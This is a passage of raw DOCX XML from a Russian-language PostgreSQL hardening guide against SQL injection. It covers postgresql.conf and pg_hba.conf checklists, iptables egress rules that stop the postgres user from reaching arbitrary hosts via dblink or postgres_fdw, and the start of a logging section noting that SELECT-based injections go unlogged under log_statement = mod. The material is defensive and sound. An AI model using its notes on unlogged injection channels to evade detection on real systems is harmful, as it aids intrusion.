        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Для postgres_fdw — нет нативной opcji "не пускать в произвольный host";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># защита целиком на сетевом уровне.</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Для dblink — то же. Если использовать через kernel-level firewall:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># iptables -A OUTPUT -p tcp --dport 5432 -m owner --uid-owner postgres -d &lt;whitelisted_IPs&gt; -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># iptables -A OUTPUT -p tcp --dport 5432 -m owner --uid-owner postgres -j REJECT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Параметры, влияющие на CTE / planner</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enable_async_append = on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG 14+) — feature; не security-related.</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jit = on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default) — JIT compilation. На очень нагруженных deployments может усиливать time-based difference (warmup vs hot path); для security-критичных кейсов — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">jit = off</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enable_hashagg = on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default) — отключение даёт другой execution plan для aggregate, может маскировать time-based.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">temp_file_limit и work_mem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">work_mem = 4MB                # per-operation memory; превышение → temp files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">temp_file_limit = '1GB'       # лимит на размер temp files per session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита от resource exhaustion через сложные CTE (3.10.2 CTE-amplified time) или огромные UNION (3.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">shared_preload_libraries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">shared_preload_libraries = 'pg_stat_statements, pgaudit, auto_explain'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_explain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для диагностики plan-cache issues (3.17.1 / 3.17.3 R8/R9), но включать осторожно — overhead на каждом запросе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чек-лист postgresql.conf для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Параметр</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Значение</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Защищает от</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statement_timeout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30000 (или per-role меньше)</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3.4, 3.10.2</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lock_timeout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 через advisory locks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idle_in_transaction_session_timeout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60000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зомби-транзакции, удержание locks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log_statement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'mod' (или 'all' с pgaudit)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observability injection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log_min_error_statement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error-based injection (3.2)</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log_connections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 TCP-эксфильтрация</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log_disconnections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session leakage analysis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ssl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on + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">sslmode=verify-full</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на клиенте</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R10 CVE-2024-10977 MITM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ssl_min_protocol_version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'TLSv1.2' (минимум)</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downgrade-attack защита</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password_encryption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'scram-sha-256'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offline-cracking защита</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row_security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default_transaction_read_only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per-role: on для read-only API</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 / 3.10.1</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temp_file_limit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1GB</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resource exhaustion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shared_preload_libraries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pg_stat_statements, pgaudit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observability (5.6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чек-лист pg_hba.conf</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Нет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">trust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для non-loopback.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Нет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (старый md5). Используется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scram-sha-256</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Финальная строка — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">host all all 0.0.0.0/0 reject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (explicit deny).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Application-роли — отдельная строка с конкретным CIDR (не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0.0.0.0/0</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Replication — отдельная строка с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hostssl</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Связь с другими разделами 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5.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — детальное логирование через pgaudit / pg_stat_statements (тесная связь).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — конфиги работают вместе с привилегиями (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">default_transaction_read_only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> бессмыслен, если у роли есть </w:t>
      </w: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5.4</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shared_preload_libraries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — точка контроля для C-расширений.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с категориями 3.X.N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3.4 / 3.10.2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основной mitigation.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> RLS — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">row_security = on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + проверка через rolconfig.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R10 / R6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SSL/TLS verify-full закрывает.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stacked queries — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">default_transaction_read_only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ограничивает blast radius.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.6 Логирование и наблюдаемость</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Логи — последний рубеж: если injection прошла все предыдущие фильтры (5.1–5.5), наблюдаемость даёт шанс заметить аномалию post-factum или в real-time. Раздел определяет, какие сигналы атаки видны в каких логах, и как их собрать в actionable feed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">log_statement: что куда писать</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL пишет в server log при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_statement = mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рекомендация 5.5) все DDL и DML-модификации. SELECT-инъекции — UNION / error-based / blind-каналы / time-based — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не пишутся</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Чтобы покрыть весь класс, нужно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_statement = all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> либо использовать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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trade-off:</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all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — каждая команда в server log. Объём огромен (10–100x от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), но видны все SELECT-инъекции.</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 гибче: можно включать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">READ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> только для конкретных tables / schemas. Меньше шума.</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нормализованные запросы агрегированно. Не каждый вызов, но видна общая картина (что выполнялось и сколько раз).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Production-pattern: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log_statement = mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> глобально + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgaudit.log = 'read, write, ddl, role'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на critical-tables +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для аналитики паттернов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_stat_statements: что искать</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Какие normalized queries запускались, отсортированные по общему времени</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
